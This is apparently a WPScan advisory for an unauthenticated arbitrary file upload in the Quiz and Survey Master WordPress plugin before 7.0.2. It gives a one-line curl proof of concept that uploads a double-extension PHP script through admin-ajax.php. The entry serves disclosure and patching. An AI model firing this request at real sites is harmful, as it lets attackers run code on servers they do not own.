WordPress Plugin Vulnerabilities

Quiz and Survey Master < 7.0.2 - Unauthenticated Arbitrary File Upload

Description

Because the plugin doesn't validate the name of the uploaded file, an unauthenticated user could upload a PHP script with a double extension, e.g., script.php.jpg, and execute it on HTTP servers running a configuration such as Apache + PHP FastCGI.


Edit (WPScanTeam): This appears to be due to an incomplete fix of https://wpvulndb.com/vulnerabilities/10349

Proof of Concept

$ curl 'http://example.com/wp-admin/admin-ajax.php' -F 'action=qsm_upload_image_fd_question' -F 'question_id={some-id}' -F '[email protected]'

Affects Plugins

quiz-master-next

Fixed in version 7.0.2

References

URL

https://plugins.trac.wordpress.org/changeset/2363719/quiz-master-next/trunk/php/classes/class-qmn-quiz-manager.php?old=2353115&old_path=quiz-master-next%2Ftrunk%2Fphp%2Fclasses%2Fclass-qmn-quiz-manager.php

Classification

Type

UPLOAD

CWE

CWE-434

Miscellaneous

Original Researcher

NinTechNet

Submitter

Wiyada Sinsad

Submitter website

https://nintechnet.com/

Verified

WPVDB ID

212712b5-c3be-47d1-b1d4-f98585e6f472

Timeline

Publicly Published

2020-08-29 (about 2 years ago)

Added

2020-08-29 (about 2 years ago)

Last Updated

2020-08-29 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin